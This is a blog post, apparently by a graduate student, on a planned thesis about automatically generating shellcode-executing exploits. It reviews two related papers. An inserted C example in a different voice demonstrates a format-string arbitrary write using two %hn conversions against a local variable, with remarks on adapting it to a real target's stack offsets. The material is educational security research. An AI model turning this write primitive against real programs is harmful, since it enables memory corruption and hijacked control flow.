Auto-generating exploits
So I’ve agreed on a general topic for my MSc thesis with my supervisor, the basic idea being to take a known vulnerability and from that generate a shellcode-executing exploit. Obviously there are a bucketload of problems that this summary glosses over, but I intend to start out fairly basic with a vanilla stack overflow and work my way towards more interesting vulnerabilities. Given the time, I’d also like to deal with protection mechanisms, e.g. ASLR, DEP etc.
There doesn’t seem to be any published research that deals with this topic exactly. [1] describes a mechanism for specifying API-level exploits, that is, exploits that are the result of a sequence of API calls that violates some safety property. They also treat printf like an API and describe how to automatically generate format strings that read/write arbitrary values and locations. The main issue with their approach is that it only deals with format string exploits, which are fairly trivial, and it requires manual reverse engineering to determine certain parameters required in the exploit (like the buffer length available).
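To make the format-string primitive mentioned above concrete, here is an added example (my own illustration, not code from [1] or from the paper's tool) of generating a format string that writes an arbitrary 32-bit value via two `%hn` conversions. It assumes a glibc-style printf where `%hn` stores the low 16 bits of the running character count, and it passes the `%hn` target pointers as explicit printf arguments. The part that [1] leaves to manual reverse engineering, namely getting those pointers onto the stack and finding the argument offset that reaches them, is deliberately left out so the code runs deterministically on any host.

```c
/* Added example: the %hn arbitrary-write primitive behind format-string exploits. */
#undef _FORTIFY_SOURCE   /* fortified glibc printf aborts on %n in a writable format string */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Width for a "%<w>u" conversion so that the running character count,
 * reduced mod 2^16 by %hn, lands on `want`.  Width 0 still prints "0" (one
 * character), so a wanted value equal to the current count is reached by
 * printing a full 65536 characters rather than none. */
static unsigned pad_for(unsigned want, unsigned printed_so_far) {
    unsigned w = (want - printed_so_far) & 0xffffu;
    return w == 0 ? 0x10000u : w;
}

/* Generate "%<p1>u%hn%<p2>u%hn": two half-word writes that together store
 * the 32-bit `value`, low half first.  Returns the length of the format. */
int build_write_format(char *fmt, size_t fmtsz, uint32_t value) {
    unsigned lo = value & 0xffffu, hi = value >> 16;
    unsigned p1 = pad_for(lo, 0);
    unsigned p2 = pad_for(hi, p1);
    return snprintf(fmt, fmtsz, "%%%uu%%hn%%%uu%%hn", p1, p2);
}

static int little_endian(void) {
    union { uint16_t u; uint8_t b[2]; } t = { 1 };
    return t.b[0] == 1;
}

/* Run the generated format against a local target and return what it wrote.
 * The %hn pointers are handed to snprintf explicitly (assumption for this
 * demo); in a real exploit they would have to sit on the stack and be reached
 * with the right argument offset, the part [1] leaves to manual RE. */
uint32_t fmt_write_u32(uint32_t value) {
    union { uint32_t word; uint16_t half[2]; } target = { 0 };
    uint16_t *lo = &target.half[little_endian() ? 0 : 1];
    uint16_t *hi = &target.half[little_endian() ? 1 : 0];
    char fmt[64];
    build_write_format(fmt, sizeof fmt, value);
    /* NULL buffer with size 0: snprintf only counts, so nothing is printed,
     * but %hn still stores the running count through the pointer arguments. */
    snprintf(NULL, 0, fmt, 0u, lo, 0u, hi);
    return target.word;
}

int main(void) {
    char fmt[64];
    uint32_t want = 0xdeadbeefu;
    build_write_format(fmt, sizeof fmt, want);
    printf("format: %s\n", fmt);
    printf("wrote : 0x%08x\n", fmt_write_u32(want));
    return 0;
}
```

The two widths are computed mod 2^16, so the order of the half-word writes does not matter and the longest output is always under 2·65536 characters; with a real target you would swap the explicit pointers for the stack-slot positional arguments (`%<offset>$hn`) once the offset and the available buffer length are known.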
The only other paper I have found is [2], which describes a technique for automatically generating exploits based on a patched version of a program and the original. This is actually pretty cool, although their definition of an ‘exploit’ is different to mine. They consider an exploit to be any violation of a certain property, such as the return address of a stack frame being modified. Due to this definition, what they actually generate are denial of service conditions as opposed to exploits that result in code execution*.
The opinion of a few people, and one that I can see the reasoning behind, is that automatically generating exploits for the majority of vulnerabilities just isn’t feasible due to the level of customisation required. We’ll see….
[1] Automatic Discovery of API-Level Exploits, V. Ganapathy
[2] Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications, D. Brumley
* After reading the paper a bit more closely (doh!) and talking with the authors, it turns out they did actually generate control hijacking exploits for some vulnerabilities. Apparently not much research was put into this particular part of the project though so there’s still plenty to look at.